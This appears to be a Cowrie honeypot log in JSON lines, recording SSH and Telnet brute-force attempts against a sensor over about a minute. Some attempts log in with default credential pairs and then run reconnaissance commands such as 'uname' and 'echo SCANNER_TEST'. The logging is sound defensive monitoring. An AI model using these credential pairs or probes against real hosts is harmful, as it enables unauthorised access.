{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40862,"dst_ip":"1.2.3.4","dst_port":22,"session":"317c6d2cf37b","protocol":"ssh","message":"New connection: 212.227.125.160:40862 (1.2.3.4:22) [session: 317c6d2cf37b]","sensor":"my-vps","timestamp":"2025-08-31T02:40:39.097561Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:39.316701Z","src_ip":"41.226.27.251","session":"c57e7e2cb940"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:39.656946Z","src_ip":"212.227.125.160","session":"317c6d2cf37b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:40:39.657838Z","src_ip":"212.227.125.160","session":"317c6d2cf37b"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:40:39.812473Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"19.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 19.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:40.798645Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
{"eventid":"cowrie.session.closed","duration":"119.2","message":"Connection lost after 119.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:40.799756Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:41.063598Z","src_ip":"212.227.125.160","session":"8a26a9fa23e7"}
{"eventid":"cowrie.login.failed","username":"es","password":"letmein","message":"login attempt [es/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:40:41.927387Z","src_ip":"212.227.125.160","session":"317c6d2cf37b"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:43.477962Z","src_ip":"212.227.125.160","session":"317c6d2cf37b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33318,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d9dca24b53a","protocol":"ssh","message":"New connection: 212.227.235.229:33318 (1.2.3.4:22) [session: 0d9dca24b53a]","sensor":"my-vps","timestamp":"2025-08-31T02:40:56.065168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:56.197914Z","src_ip":"212.227.235.229","session":"0d9dca24b53a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:40:56.698251Z","src_ip":"212.227.235.229","session":"0d9dca24b53a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46892,"dst_ip":"1.2.3.4","dst_port":22,"session":"acc7f8e0a0fa","protocol":"ssh","message":"New connection: 41.226.27.251:46892 (1.2.3.4:22) [session: acc7f8e0a0fa]","sensor":"my-vps","timestamp":"2025-08-31T02:40:58.218827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:58.220137Z","src_ip":"41.226.27.251","session":"acc7f8e0a0fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:40:58.265600Z","src_ip":"41.226.27.251","session":"acc7f8e0a0fa"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T02:40:58.402522Z","src_ip":"41.226.27.251","session":"acc7f8e0a0fa"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T02:40:58.530936Z","src_ip":"212.227.235.229","session":"0d9dca24b53a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:59.684953Z","src_ip":"41.226.27.251","session":"acc7f8e0a0fa"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:59.738954Z","src_ip":"212.227.235.229","session":"0d9dca24b53a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42986,"dst_ip":"1.2.3.4","dst_port":23,"session":"98b034184fe6","protocol":"telnet","message":"New connection: 212.227.125.160:42986 (1.2.3.4:23) [session: 98b034184fe6]","sensor":"my-vps","timestamp":"2025-08-31T02:41:04.595361Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T02:41:04.878711Z","src_ip":"212.227.125.160","session":"98b034184fe6"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T02:41:06.189610Z","src_ip":"212.227.125.160","session":"98b034184fe6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:41:07.360590Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:41:07.361369Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.session.closed","duration":2.768068552017212,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:07.363351Z","src_ip":"212.227.125.160","session":"98b034184fe6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42988,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a3763826c16","protocol":"telnet","message":"New connection: 212.227.125.160:42988 (1.2.3.4:23) [session: 7a3763826c16]","sensor":"my-vps","timestamp":"2025-08-31T02:41:07.496276Z"}
{"eventid":"cowrie.session.closed","duration":1.296466588973999,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:08.792670Z","src_ip":"212.227.125.160","session":"7a3763826c16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42996,"dst_ip":"1.2.3.4","dst_port":23,"session":"895dce1535dd","protocol":"telnet","message":"New connection: 212.227.125.160:42996 (1.2.3.4:23) [session: 895dce1535dd]","sensor":"my-vps","timestamp":"2025-08-31T02:41:08.890194Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:41:10.250607Z","src_ip":"212.227.125.160","session":"895dce1535dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:41:10.266413Z","src_ip":"212.227.125.160","session":"895dce1535dd"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T02:41:10.399468Z","src_ip":"212.227.125.160","session":"895dce1535dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:11.468873Z","src_ip":"212.227.125.160","session":"895dce1535dd"}
{"eventid":"cowrie.session.closed","duration":2.5818769931793213,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:11.471998Z","src_ip":"212.227.125.160","session":"895dce1535dd"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:41:17.579530Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59660,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9612abd2fc2","protocol":"ssh","message":"New connection: 212.227.235.229:59660 (1.2.3.4:22) [session: d9612abd2fc2]","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.111910Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60536,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a3fda286c36","protocol":"ssh","message":"New connection: 212.227.125.160:60536 (1.2.3.4:22) [session: 5a3fda286c36]","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.166466Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42270,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc710b50e9e0","protocol":"ssh","message":"New connection: 41.226.27.251:42270 (1.2.3.4:22) [session: cc710b50e9e0]","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.657876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.684781Z","src_ip":"41.226.27.251","session":"cc710b50e9e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.707849Z","src_ip":"41.226.27.251","session":"cc710b50e9e0"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.913508Z","src_ip":"41.226.27.251","session":"cc710b50e9e0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.936094Z","src_ip":"212.227.235.229","session":"d9612abd2fc2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:41:18.936669Z","src_ip":"212.227.235.229","session":"d9612abd2fc2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:20.238754Z","src_ip":"41.226.27.251","session":"cc710b50e9e0"}
{"eventid":"cowrie.login.failed","username":"es","password":"welcome","message":"login attempt [es/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:41:24.691255Z","src_ip":"212.227.235.229","session":"d9612abd2fc2"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:26.646769Z","src_ip":"212.227.235.229","session":"d9612abd2fc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"21.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 21.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:28.358479Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.session.closed","duration":"117.7","message":"Connection lost after 117.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:28.359511Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.session.closed","duration":"20.4","message":"Connection lost after 20.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:38.573923Z","src_ip":"212.227.125.160","session":"5a3fda286c36"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42692,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5089c71bbb3","protocol":"ssh","message":"New connection: 41.226.27.251:42692 (1.2.3.4:22) [session: c5089c71bbb3]","sensor":"my-vps","timestamp":"2025-08-31T02:41:38.955762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:41:38.967065Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:41:39.000757Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:41:39.179667Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:41:39.288146Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:41:39.288884Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:39.334850Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:39.335912Z","src_ip":"41.226.27.251","session":"c5089c71bbb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50332,"dst_ip":"1.2.3.4","dst_port":22,"session":"217a5a584502","protocol":"ssh","message":"New connection: 212.227.125.160:50332 (1.2.3.4:22) [session: 217a5a584502]","sensor":"my-vps","timestamp":"2025-08-31T02:41:39.523838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:41:40.059158Z","src_ip":"212.227.125.160","session":"217a5a584502"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:41:40.119228Z","src_ip":"212.227.125.160","session":"217a5a584502"}
{"eventid":"cowrie.login.failed","username":"es","password":"welcome","message":"login attempt [es/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:41:41.898582Z","src_ip":"212.227.125.160","session":"217a5a584502"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:43.436512Z","src_ip":"212.227.125.160","session":"217a5a584502"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:41:45.560977Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:41:45.561671Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:51.846532Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
{"eventid":"cowrie.session.closed","duration":"96.0","message":"Connection lost after 96.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:41:52.010597Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
